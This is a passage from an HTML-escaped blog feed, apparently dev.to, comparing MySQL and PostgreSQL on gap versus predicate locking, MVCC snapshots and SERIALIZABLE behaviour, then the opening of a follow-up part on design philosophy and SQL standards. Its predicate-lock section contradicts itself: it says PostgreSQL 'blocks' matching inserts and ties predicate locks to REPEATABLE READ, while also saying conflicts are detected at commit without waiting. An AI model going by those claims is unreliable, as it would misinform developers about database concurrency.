&lt;li&gt;The gap &lt;em&gt;after&lt;/em&gt; 200 (e.g., 201-205)&lt;/li&gt;
&lt;li&gt;All gaps &lt;em&gt;between&lt;/em&gt; existing rows in the range&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The catch:&lt;/strong&gt; Gap locks are range-based, not logic-based. They don't understand your WHERE clause's full meaning—they just lock index ranges. This can block inserts that are logically unrelated to your query.&lt;/p&gt;
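&lt;p&gt;You can watch this broad blocking happen with two sessions—a hypothetical &lt;code&gt;products&lt;/code&gt; table where rows with IDs 100 and 200 exist but 150 does not:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- Session 1 (MySQL, REPEATABLE READ): lock the range and its gaps
BEGIN;
SELECT * FROM products WHERE id BETWEEN 100 AND 200 FOR UPDATE;

-- Session 2: inserts wait, even though no row with these IDs exists yet
INSERT INTO products (id, name) VALUES (150, 'Webcam');  -- blocked (gap inside the range)
INSERT INTO products (id, name) VALUES (201, 'Mouse');   -- may also block (next-key lock past 200)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Whether the insert at 201 blocks depends on where the next index record sits—the next-key lock extends up to it.&lt;/p&gt;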

&lt;h4&gt;
  
  
  PostgreSQL's Predicate Locks: The Precision Specialist
&lt;/h4&gt;

&lt;p&gt;PostgreSQL uses &lt;strong&gt;predicate locks&lt;/strong&gt; (also called SIREAD locks) as part of its SERIALIZABLE machinery—it remembers the actual &lt;em&gt;predicate&lt;/em&gt; (WHERE clause) you used and only treats operations that would violate that specific predicate as conflicts, detected at commit rather than by making writers wait.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Instead of locking physical gaps in an index, PostgreSQL tracks the logical condition of your query. It says "I'm watching for any inserts that match &lt;code&gt;WHERE category = 'Electronics'&lt;/code&gt;"—and only those get blocked.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; Lock electronics products:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;products&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;category&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'Electronics'&lt;/span&gt; &lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;UPDATE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;PostgreSQL blocks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Only inserts where &lt;code&gt;category = 'Electronics'&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Inserts with other categories proceed freely&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The advantage:&lt;/strong&gt; Higher concurrency because only actual predicate matches get blocked. If your query was &lt;code&gt;WHERE category = 'Electronics' AND price &amp;gt; 100&lt;/code&gt;, PostgreSQL only blocks inserts matching &lt;em&gt;both&lt;/em&gt; conditions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Key Difference:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;MySQL (Gap Locking)&lt;/th&gt;
&lt;th&gt;PostgreSQL (Predicate Locks)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Locking Scope&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;🔴 Range-based - Locks index gaps, may block unrelated inserts&lt;/td&gt;
&lt;td&gt;🟢 Predicate-based - Only locks rows matching WHERE clause&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Blocking Behavior&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Blocks inserts in or near locked range, even outside query conditions&lt;/td&gt;
&lt;td&gt;Blocks only inserts that match the exact query predicate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Concurrency Impact&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Lower - Can block logically unrelated operations&lt;/td&gt;
&lt;td&gt;Higher - Only blocks actual conflicts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Query &lt;code&gt;WHERE date BETWEEN '2024-02-01' AND '2024-06-30'&lt;/code&gt; may block insert at &lt;code&gt;2024-01-31&lt;/code&gt; (adjacent gap)&lt;/td&gt;
&lt;td&gt;Same query only blocks inserts matching both date range AND other conditions&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Example Scenario:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Lock contracts: WHERE start_date BETWEEN '2024-02-01' AND '2024-06-30' AND office_id = 1&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Insert Attempt&lt;/th&gt;
&lt;th&gt;MySQL Gap Locking&lt;/th&gt;
&lt;th&gt;PostgreSQL Predicate Locks&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;office_id=1, date='2024-03-15'&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;❌ BLOCKS (in range)&lt;/td&gt;
&lt;td&gt;❌ BLOCKS (matches predicate)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;office_id=1, date='2024-01-31'&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;❌ BLOCKS (adjacent gap)&lt;/td&gt;
&lt;td&gt;✅ SUCCEEDS (outside date range)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;office_id=2, date='2024-03-15'&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;✅ SUCCEEDS (different office)&lt;/td&gt;
&lt;td&gt;✅ SUCCEEDS (different office)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Bottom Line:&lt;/strong&gt; MySQL's gap locks are pessimistic and broader (blocking adjacent ranges), while PostgreSQL's predicate locks are precise (only blocking exact predicate matches). This makes PostgreSQL more concurrent at REPEATABLE READ level.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. MVCC and Transaction Isolation
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: For detailed MVCC storage implementation, see &lt;a href="https://dev.to/harry_do/part-2-mysql-vs-postgresql-storage-architecture-2ki1"&gt;Part 2: Storage Architecture, Section 3&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Both databases use MVCC (Multi-Version Concurrency Control) to enable concurrent transactions, but their different MVCC implementations directly impact transaction isolation behavior. Understanding how MVCC affects transactions helps explain why certain isolation anomalies occur.&lt;/p&gt;

&lt;h3&gt;
  
  
  How MVCC Enables Isolation
&lt;/h3&gt;

&lt;p&gt;MVCC allows readers to see consistent snapshots of data without blocking writers. The key question: &lt;strong&gt;When does a transaction see changes made by other transactions?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;MySQL's Approach:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Uses undo log to reconstruct old row versions&lt;/li&gt;
&lt;li&gt;At REPEATABLE READ: Creates a consistent snapshot at first read&lt;/li&gt;
&lt;li&gt;Readers see the snapshot, even if other transactions commit changes&lt;/li&gt;
&lt;li&gt;Writers acquire locks, creating potential blocking&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;PostgreSQL's Approach:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Uses tuple versioning with transaction IDs&lt;/li&gt;
&lt;li&gt;At REPEATABLE READ: Creates a snapshot at the transaction's first statement (not at BEGIN itself)&lt;/li&gt;
&lt;li&gt;Readers see the snapshot, completely isolated from concurrent changes&lt;/li&gt;
&lt;li&gt;Writers don't block readers (true snapshot isolation)&lt;/li&gt;
&lt;/ul&gt;
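&lt;p&gt;One subtle point worth verifying yourself: in both systems the REPEATABLE READ snapshot is established by the first query, not by &lt;code&gt;BEGIN&lt;/code&gt;. A sketch against a hypothetical &lt;code&gt;accounts&lt;/code&gt; table:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- PostgreSQL (REPEATABLE READ): the snapshot starts at the first statement
BEGIN ISOLATION LEVEL REPEATABLE READ;
-- ...changes committed by other sessions right now are STILL visible...
SELECT balance FROM accounts WHERE id = 1;  -- snapshot is taken here
SELECT balance FROM accounts WHERE id = 1;  -- guaranteed to match the first read
COMMIT;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;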

&lt;h3&gt;
  
  
  Transaction Behavior Implications
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Scenario: Two concurrent transactions updating the same row&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;MySQL (REPEATABLE READ)&lt;/th&gt;
&lt;th&gt;PostgreSQL (REPEATABLE READ)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T1: BEGIN&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Snapshot created on first read&lt;/td&gt;
&lt;td&gt;Snapshot created at first statement&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T1: SELECT balance&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Sees 1000, creates snapshot&lt;/td&gt;
&lt;td&gt;Sees 1000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T2: UPDATE balance = 900&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;T2 acquires row lock&lt;/td&gt;
&lt;td&gt;T2 proceeds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T2: COMMIT&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Lock released&lt;/td&gt;
&lt;td&gt;Commits successfully&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T1: SELECT balance again&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Still sees 1000 (snapshot)&lt;/td&gt;
&lt;td&gt;Still sees 1000 (snapshot)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T1: UPDATE balance = 800&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Must wait if T2 holds lock&lt;/td&gt;
&lt;td&gt;❌ Aborts: "could not serialize access due to concurrent update"&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Key Difference:&lt;/strong&gt; MySQL blocks T1's UPDATE until T2 releases its lock, then applies it to the newly committed version—T1 succeeds, but its write is based on a read that is now stale. PostgreSQL refuses to update a row that changed after T1's snapshot: at REPEATABLE READ, T1's UPDATE fails with a serialization error and the transaction must be retried.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why This Matters for Isolation Levels
&lt;/h3&gt;

&lt;p&gt;The MVCC implementation explains why:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Both prevent phantom reads at REPEATABLE READ&lt;/strong&gt; - MySQL uses gap locks, PostgreSQL uses snapshots&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Both allow write-skew at REPEATABLE READ&lt;/strong&gt; - Neither detects cross-row constraint violations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL's SSI at SERIALIZABLE is more powerful&lt;/strong&gt; - Tuple versioning enables dependency tracking&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;MySQL requires more explicit locking&lt;/strong&gt; - Undo log approach is coupled with pessimistic locking&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Bottom Line:&lt;/strong&gt; MVCC isn't just about storage—it fundamentally shapes how transactions interact. MySQL's undo log approach favors predictability through locking. PostgreSQL's tuple versioning favors concurrency but requires VACUUM maintenance.&lt;/p&gt;
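&lt;p&gt;The maintenance side of this trade-off is observable. A monitoring sketch (standard system views on both; the &lt;code&gt;accounts&lt;/code&gt; table name is illustrative):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- PostgreSQL: how many dead tuples are waiting for VACUUM?
SELECT relname, n_dead_tup, last_autovacuum
FROM pg_stat_user_tables
ORDER BY n_dead_tup DESC;

-- Reclaim space manually if autovacuum is falling behind
VACUUM (VERBOSE) accounts;

-- MySQL: the equivalent pressure shows up as undo history
SHOW ENGINE INNODB STATUS;  -- look for "History list length"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;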

&lt;h2&gt;
  
  
  4. SERIALIZABLE Isolation: Pessimistic vs Optimistic Strategies
&lt;/h2&gt;

&lt;p&gt;💡 &lt;strong&gt;Key Insight:&lt;/strong&gt; This is the ultimate showdown! 🥊 At SERIALIZABLE isolation level, the philosophical differences between MySQL and PostgreSQL reach their peak. MySQL is the bouncer who doesn't let anyone suspicious near the door (pessimistic locking). PostgreSQL is the cool host who lets everyone in, then kicks out troublemakers at the end (optimistic SSI). MySQL says "better safe than sorry," while PostgreSQL says "let's roll the dice and see what happens!" Both approaches work—just depends on whether you prefer blocking or retrying.&lt;/p&gt;

&lt;p&gt;SERIALIZABLE is the strictest isolation level—it guarantees that concurrent transactions produce the same result as if they ran one at a time, in some serial order. Sounds great, right? The catch is &lt;strong&gt;how&lt;/strong&gt; you achieve this. Both databases get there, but the experience is totally different.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: For detailed locking mechanisms, see Section 2.3.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  The Key Differences
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;MySQL (Pessimistic)&lt;/th&gt;
&lt;th&gt;PostgreSQL (Optimistic - SSI)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Strategy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Block conflicts before they happen&lt;/td&gt;
&lt;td&gt;Detect conflicts at commit time&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SELECT Behavior&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Plain SELECTs become &lt;code&gt;SELECT ... FOR SHARE&lt;/code&gt; (acquire shared locks)&lt;/td&gt;
&lt;td&gt;Plain SELECTs don't acquire locks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Blocking Point&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Early - On reads (FOR UPDATE/FOR SHARE)&lt;/td&gt;
&lt;td&gt;Late - On commit (conflict detection)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Concurrency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Lower - Extensive blocking&lt;/td&gt;
&lt;td&gt;✅ Higher - Concurrent execution allowed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Transaction Failures&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;✅ Rare (blocking prevents conflicts)&lt;/td&gt;
&lt;td&gt;❌ More common (serialization errors)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Write-Skew Detection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ No - Only prevents through blocking&lt;/td&gt;
&lt;td&gt;✅ Yes - SSI detects and aborts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Application Code&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;✅ Simpler (no retry logic)&lt;/td&gt;
&lt;td&gt;❌ More complex (must handle retries)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;What this means in practice:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When you run transactions at SERIALIZABLE in MySQL, even plain &lt;code&gt;SELECT&lt;/code&gt; statements automatically acquire shared locks (as if you wrote &lt;code&gt;SELECT ... FOR SHARE&lt;/code&gt;). Other readers can share those locks, but Transaction 2 trying to update what Transaction 1 read? Blocked. Transaction 1 trying to read what Transaction 2 has locked for update? Blocked. Writers and readers wait politely in line.&lt;/p&gt;

&lt;p&gt;PostgreSQL does the opposite. Transactions run freely, reading and writing concurrently. PostgreSQL's SSI (Serializable Snapshot Isolation) tracks dependencies between transactions. Only at commit time does PostgreSQL ask: "Would this ordering violate serializability?" If yes, one transaction gets aborted with a serialization error. If no, everyone commits happily.&lt;/p&gt;

&lt;p&gt;This is why PostgreSQL can detect write-skew anomalies (remember the doctor scheduling problem?) while MySQL can't—SSI is smart enough to see the dangerous pattern. MySQL just blocks aggressively and hopes for the best.&lt;/p&gt;
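&lt;p&gt;Because of those commit-time aborts, application code that runs SERIALIZABLE transactions against PostgreSQL should be prepared to retry. The failure itself looks like this (a sketch reusing the &lt;code&gt;doctors&lt;/code&gt; table from Section 2.2):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- PostgreSQL: run the same pattern in two concurrent sessions
BEGIN ISOLATION LEVEL SERIALIZABLE;
SELECT COUNT(*) FROM doctors WHERE on_call = true;
UPDATE doctors SET on_call = false WHERE name = 'Alice';
COMMIT;
-- Whichever session commits second can fail with:
--   ERROR: could not serialize access due to read/write dependencies
--   among transactions (SQLSTATE 40001)
-- The application should catch 40001 and re-run the whole transaction.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;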

&lt;h3&gt;
  
  
  Behavior Comparison
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Scenario:&lt;/strong&gt; Two concurrent transactions reading and updating different rows&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;MySQL SERIALIZABLE&lt;/th&gt;
&lt;th&gt;PostgreSQL SERIALIZABLE&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T1: SELECT&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Acquires shared locks&lt;/td&gt;
&lt;td&gt;No locks, proceeds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T2: SELECT FOR UPDATE&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ &lt;strong&gt;BLOCKS&lt;/strong&gt; waiting for T1&lt;/td&gt;
&lt;td&gt;✅ Proceeds concurrently&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T1: UPDATE + COMMIT&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Completes, T2 unblocks&lt;/td&gt;
&lt;td&gt;Completes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;T2: UPDATE + COMMIT&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Completes after wait&lt;/td&gt;
&lt;td&gt;May &lt;strong&gt;ABORT&lt;/strong&gt; if SSI detects conflict&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  The Trade-off
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Choose MySQL When&lt;/th&gt;
&lt;th&gt;Choose PostgreSQL When&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;✅ Need predictable behavior (rare failures)&lt;/td&gt;
&lt;td&gt;✅ Need maximum concurrency&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;✅ Want simpler application code (no retries)&lt;/td&gt;
&lt;td&gt;✅ Need write-skew detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;✅ Low contention workload&lt;/td&gt;
&lt;td&gt;✅ Have retry logic implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;✅ Can tolerate blocking delays&lt;/td&gt;
&lt;td&gt;✅ High-contention workload benefits from optimism&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Bottom Line:&lt;/strong&gt; MySQL = fewer failures but more blocking. PostgreSQL = more failures but higher throughput.&lt;/p&gt;

</description>
      <category>postgres</category>
      <category>database</category>
      <category>mysql</category>
      <category>architecture</category>
    </item>
    <item>
      <title>Part 3 - MySQL vs PostgreSQL: Features &amp; Capabilities Comparison</title>
      <dc:creator>Harry Do</dc:creator>
      <pubDate>Sat, 18 Oct 2025 09:26:54 +0000</pubDate>
      <link>https://dev.to/harry_do/part-3-mysql-vs-postgresql-features-capabilities-comparison-13gj</link>
      <guid>https://dev.to/harry_do/part-3-mysql-vs-postgresql-features-capabilities-comparison-13gj</guid>
      <description>&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;1. Philosophy &amp;amp; Design Principles: The Core DNA&lt;/li&gt;
&lt;li&gt;2. Standards Compliance: SQL Standard Adherence&lt;/li&gt;
&lt;li&gt;3. Data Types &amp;amp; Flexibility&lt;/li&gt;
&lt;li&gt;4. Indexing Capabilities: Different Strategies for Different Needs&lt;/li&gt;
&lt;li&gt;5. Index Scan Types: How They Actually Find Your Data&lt;/li&gt;
&lt;li&gt;6. Views Support: Real-Time vs Pre-Computed&lt;/li&gt;
&lt;li&gt;7. Security Features: Locking Down Your Data&lt;/li&gt;
&lt;li&gt;Wrapping Up&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Alright, let's get into the nitty-gritty differences between MySQL and PostgreSQL. It's time to see how their core philosophies and features actually play out in the real world.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Philosophy &amp;amp; Design Principles: The Core DNA
&lt;/h2&gt;

&lt;p&gt;💡 &lt;strong&gt;Key Insight:&lt;/strong&gt; Understanding the fundamental design philosophies helps predict how each database will behave in different scenarios. Think of it as getting to know someone's personality before you start working together.&lt;/p&gt;

&lt;p&gt;Here's the thing: MySQL and PostgreSQL were born with different goals in mind, and you can see it in every decision they make.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 MySQL: The "Keep It Simple, Keep It Fast" Approach
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Core Principle:&lt;/strong&gt; "Speed, Simplicity, and Reliability"&lt;/p&gt;

&lt;p&gt;MySQL is like that friend who always shows up on time, doesn't complicate things, and just gets the job done. It's engineered to be fast and straightforward, making it the go-to choice for web applications where you're mostly reading data and want things to just &lt;em&gt;work&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What MySQL Really Cares About:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;⚡ &lt;strong&gt;Performance First:&lt;/strong&gt; It's optimized for speed and quick response times—MySQL wants to be the fastest kid on the block&lt;/li&gt;
&lt;li&gt;🎯 &lt;strong&gt;Simplicity:&lt;/strong&gt; Easy to set up, configure, and maintain—no PhD required
&lt;/li&gt;
&lt;li&gt;🔒 &lt;strong&gt;Reliability:&lt;/strong&gt; Stable and dependable for production workloads—it won't randomly flake out on you&lt;/li&gt;
&lt;li&gt;📚 &lt;strong&gt;Ease of Use:&lt;/strong&gt; Minimal learning curve—you can be productive in an afternoon&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  1.2 PostgreSQL: The "Power User's Swiss Army Knife" Approach
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Core Principle:&lt;/strong&gt; "Extensibility, Standards Compliance, and Data Integrity"&lt;/p&gt;

&lt;p&gt;PostgreSQL is like that overachieving friend who's prepared for &lt;em&gt;everything&lt;/em&gt;. It's designed to be the most feature-rich, standards-compliant, and robust system possible. If MySQL is a reliable Honda Civic, PostgreSQL is a fully-loaded Tesla with every bell and whistle you can imagine.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What PostgreSQL Really Cares About:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;🔧 &lt;strong&gt;Extensibility:&lt;/strong&gt; Highly customizable and extensible architecture—you can make it do almost anything&lt;/li&gt;
&lt;li&gt;📏 &lt;strong&gt;Standards Compliance:&lt;/strong&gt; Strict adherence to SQL standards—it's the teacher's pet of databases&lt;/li&gt;
&lt;li&gt;🛡️ &lt;strong&gt;Data Integrity:&lt;/strong&gt; Robust ACID compliance and transaction support—your data is &lt;em&gt;safe&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;⭐ &lt;strong&gt;Advanced Features:&lt;/strong&gt; Rich set of advanced database features—it's like getting 10 databases in one&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  2. Standards Compliance: SQL Standard Adherence
&lt;/h2&gt;

&lt;p&gt;PostgreSQL has consistently maintained strong adherence to SQL standards, while MySQL has historically taken a more pragmatic approach, prioritizing practicality over strict compliance. However, recent MySQL versions have significantly improved in this area.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;MySQL 8.4: Improved SQL Compliance&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;MySQL 8.4 has made substantial progress in SQL standards compliance. Key improvements include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Window functions for advanced analytical queries&lt;/li&gt;
&lt;li&gt;Common Table Expressions (CTEs) for more readable and maintainable queries&lt;/li&gt;
&lt;li&gt;Comprehensive JSON functions and operators&lt;/li&gt;
&lt;li&gt;Atomic DDL operations and improved error handling for safer schema changes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;However, some advanced SQL features remain limited or unavailable compared to PostgreSQL, including partial indexes, FULL OUTER JOIN, and certain SQL:2011+ constructs.&lt;/p&gt;
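&lt;p&gt;As a quick illustration, the CTE and window-function syntax below runs on both MySQL 8.4 and PostgreSQL 17 (the table and column names here are hypothetical):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- Rank each customer's orders by amount using a CTE plus a window function
WITH recent_orders AS (
  SELECT customer_id, id, amount
  FROM orders
  WHERE order_date &amp;gt;= '2024-01-01'
)
SELECT customer_id, id, amount,
       RANK() OVER (PARTITION BY customer_id ORDER BY amount DESC) AS amount_rank
FROM recent_orders;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;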

&lt;p&gt;&lt;strong&gt;PostgreSQL 17: Comprehensive Standards Support&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;PostgreSQL maintains the highest level of SQL standards compliance among open-source databases:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Full support for window functions and CTEs, including recursive queries&lt;/li&gt;
&lt;li&gt;Partial and expression-based indexes for optimized query performance&lt;/li&gt;
&lt;li&gt;Advanced full-text search capabilities&lt;/li&gt;
&lt;li&gt;Extensive JSON/JSONB operators and indexing support&lt;/li&gt;
&lt;li&gt;Strict adherence to ANSI SQL standards with early adoption of new features&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  3. Data Types &amp;amp; Flexibility
&lt;/h2&gt;

&lt;p&gt;PostgreSQL and MySQL take fundamentally different approaches to data type support. MySQL focuses on standard SQL types with broad compatibility, while PostgreSQL provides an extensive type system designed for specialized use cases.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
